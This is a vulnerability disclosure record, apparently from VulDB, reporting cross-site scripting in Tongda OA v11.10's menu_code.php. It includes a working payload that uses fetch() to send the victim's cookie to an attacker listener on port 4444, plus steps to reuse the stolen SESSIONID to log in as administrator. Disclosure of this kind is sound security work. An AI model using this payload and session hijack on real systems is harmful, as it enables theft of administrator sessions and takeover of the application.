| Field | Value |
|---|---|
| Title | The presence of XSS in Tongda v11.10 may allow an attacker to obtain the administrator cookie to log in to the backend |
| Description | Hi~, I found an XSS in Tongda OA v11.10, which can leak the administrator cookie through a malicious link constructed by the attacker. At the same time, V11 has session fixation, and the attacker can log in to the administrator backend through the obtained SESSIONID.<br>The reproduction process is as follows:<br>Construct the payload:<br>``http://xxx.xxx.xxx.xxx/general/ipanel/menu_code.php?MENU_TYPE=FAV&OA_SUB_WINDOW=)%df%22onmouseover=fetch(`http://192.168.110.160:4444?${document.cookie}` );//%df%22``<br>Listen on port 4444 on the attacker server; when the victim clicks on the link and the mouse hovers over the word "Settings", the cookie is received.<br>Then you can append ?SESSIONID=xxx (the obtained SESSIONID) after /general/index.php to log in to the administrator backend.<br>Official website: https://www.tongda2000.com/<br>Version: v11.10, v2017<br>Route: general/ipanel/menu_code.php |
| Source | https://github.com/Mykonos-x/cve/tree/main/cve/tongda/v11/xss |
| User | AnatomyX (UID 45354) |
| Submitted | 2023-09-12 02:55 PM (3 years ago) |
| Moderation | 2023-09-16 02:34 PM (4 days later) |
| Status | Accepted |
| VulDB Entry | 239868 [Tongda OA 11.10 menu_code.php?MENU_TYPE=FAV OA_SUB_WINDOW cross site scripting] |
| Points | 20 |